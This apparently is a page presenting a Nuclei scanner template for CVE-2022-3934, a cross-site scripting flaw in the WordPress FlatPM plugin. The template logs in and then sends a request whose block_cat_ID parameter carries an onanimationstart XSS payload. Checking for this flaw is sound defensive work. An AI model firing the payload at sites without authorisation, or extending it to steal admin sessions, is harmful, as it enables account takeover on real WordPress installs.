WordPress FlatPM <3.0.13 - Cross-Site Scripting

ID: CVE-2022-3934

Severity: medium

Author: r3Y3r53

Tags: cve2022,cve,authenticated,wpscan,xss,flatpm,wordpress,wp-plugin,mehanoid

Description

WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks.

YAML Source

id: CVE-2022-3934

info:
  name: WordPress FlatPM <3.0.13 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: Fixed in version 3.0.13.
  reference:
    - https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3934
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-3934
    cwe-id: CWE-79
    epss-score: 0.00092
    epss-percentile: 0.37956
    cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mehanoid
    product: flat_pm
    framework: wordpress
  tags: cve2022,cve,authenticated,wpscan,xss,flatpm,wordpress,wp-plugin,mehanoid

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 10s
        GET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")'
        condition: and
# digest: 4b0a0048304602210082fa04e40f783e456b55bdcd1834682b749b0404e0eba2db913536cf58df2482022100b620826b67344ada90a2836ae488cf5bb161245367815cfecfa1d55532dd84ff:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-3934.yaml"

View on Github